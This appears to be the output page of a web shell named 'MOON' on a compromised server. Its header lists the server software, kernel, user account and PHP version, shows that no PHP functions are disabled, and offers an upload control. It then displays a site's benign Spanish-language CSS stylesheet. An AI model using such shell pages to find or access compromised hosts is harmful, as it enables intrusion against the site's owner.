MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635
System: Linux server.asjudinet.com 2.6.32-042stab141.3 #1 SMP Fri Nov 15 22:45:34 MSK 2019 i686
User: asjudine (504)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: /home/asjudine/www/acalidad/css/global.css
/* Import Fonts
   ----------------------------------------*/
  @import url(http://fonts.googleapis.com/css?family=Roboto);
  @import url('https://fonts.googleapis.com/css?family=Oswald|PT+Sans');
   
html{
	box-sizing: border-box;        
}

*, *::before, *::after{
	box-sizing: inherit;
}

*{
	margin: 0;
    padding: 0;
}

body{
	background-image:url(../img/blanco.jpg);
    font-family: 'Roboto', sans-serif;
	background-repeat: no-repeat;
	background-size: cover;
	background-attachment: fixed;
}

header {
	background-color: #B7271F;
    text-align: center;
}

.header{
	margin: 0 auto;
	width: 700px;
	height: 70px;
	background-image: url(../../ELEMENTS/bannerInterasjudinet.png);
	background-size: 700px 70px;
	content: '';
}

@media only screen and (max-width: 700px){
	.header{
		margin: 0 auto;
		background-image: url(../../ELEMENTS/intermovil.png);
		background-repeat: no-repeat;
		width: auto;
		background-position: center left;
	}
}

.cerrarsesion{
 	width: auto;height: 20px;
	background-color: #DBD8C9;
    color: #000;
    font-size: 13px;
    position:absolute;
    top: 15px;right:10px;
    z-index:0;
    padding: 10px;
    border-radius: 10px;
    cursor: pointer;
}

.divirmenu{
  	text-align: center;
}
   
.irmenu{
    width: 200px;
    background-color: #1c4fa0;
    color: #fff; 
	padding: 4px;
    border-radius: 3px;
}
   
.irmenu:hover{
 	background-color: #67a0d9;
}
      
.titulo{
 	width: 100%;
 	text-align: center;
 	background-color: #dbd8c9;
 	color: #B7271F;
 	padding: 6px 0;font-size: 18px;
 	text-transform: uppercase;
}


.fecha{
	background-color: #d6e08b; 
	padding: 2px;
	color: #000;
	font-size: 15px; 
	text-align: center;
}